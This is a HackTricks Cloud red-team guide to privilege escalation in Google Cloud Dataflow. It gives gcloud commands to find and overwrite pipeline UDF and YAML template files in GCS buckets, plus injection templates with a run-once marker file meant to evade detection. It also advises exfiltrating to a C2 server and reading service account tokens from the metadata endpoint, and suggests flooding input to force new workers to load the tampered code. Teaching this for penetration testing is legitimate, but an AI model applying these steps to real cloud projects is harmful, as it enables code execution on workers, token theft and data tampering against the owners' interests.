GCP - Dataflow Privilege Escalation
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Dataflow
storage.objects.create, storage.objects.get, storage.objects.update
Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing. Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).
Attack vectors:
- UDF hijacking: Python (
.py) and JS (.js) UDFs referenced by pipelines and stored in customer-managed buckets - Job template hijacking: Custom YAML pipeline definitions stored in customer-managed buckets
Warning
Run-once-per-worker trick: Dataflow UDFs and template callables are invoked per row/line. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a file-based coordination pattern: check if a marker file (e.g.
/tmp/pwnd.txt) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs once per worker, not per line.
Direct exploitation via gcloud CLI
- Enumerate Dataflow jobs and locate the template/UDF GCS paths:
List jobs and describe to get template path, staging location, and UDF references
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>
# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
- Download the original UDF or job template from GCS:
Download UDF file or YAML template from bucket
# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
-
Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
-
Re-upload to overwrite the original file:
Overwrite UDF or template in bucket
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
- Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
Python UDF injection
If you want to have a the worker exfiltrate data to your C2 server use urllib.request and not requests.
requests is not preinstalled on classic Dataflow workers.
Malicious UDF with run-once coordination and metadata extraction
import os
import json
import urllib.request
from datetime import datetime
def _malicious_func():
# File-based coordination: run once per worker.
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return
# malicous code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
def transform(line):
# Malicous code entry point - runs per line but coordination ensures once per worker
try:
_malicious_func()
except Exception:
pass
# ... original UDF logic follows ...
Job template YAML injection
Inject a MapToFields step with a callable that uses a coordination file. For YAML-based pipelines that support requests, use it if the template declares dependencies: [requests]; otherwise prefer urllib.request.
Add the cleanup step (drop: [malicious_step]) so the pipeline still writes valid data to the destination.
Malicious MapToFields step and cleanup in pipeline YAML
- name: MaliciousTransform
type: MapToFields
input: Transform
config:
language: python
fields:
malicious_step:
callable: |
def extract_and_return(row):
import os
import json
from datetime import datetime
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return True
try:
import urllib.request
# malicious code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
except Exception:
pass
return True
append: true
- name: CleanupTransform
type: MapToFields
input: MaliciousTransform
config:
fields: {}
append: true
drop:
- malicious_step
Compute Engine access to Dataflow Workers
Permissions: compute.instances.osLogin or compute.instances.osAdminLogin (with iam.serviceAccounts.actAs over the worker SA), or compute.instances.setMetadata / compute.projects.setCommonInstanceMetadata (with iam.serviceAccounts.actAs) for legacy SSH key injection
Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token), manipulate data, or run arbitrary code.
For exploitation details, see:
- GCP - Compute Privesc —
compute.instances.osLogin,compute.instances.osAdminLogin,compute.instances.setMetadata
References
- Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow
- Control access with IAM (Dataflow)
- gcloud dataflow jobs describe
- Apache Beam YAML: User-defined functions
- Apache Beam YAML Transform Reference
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.


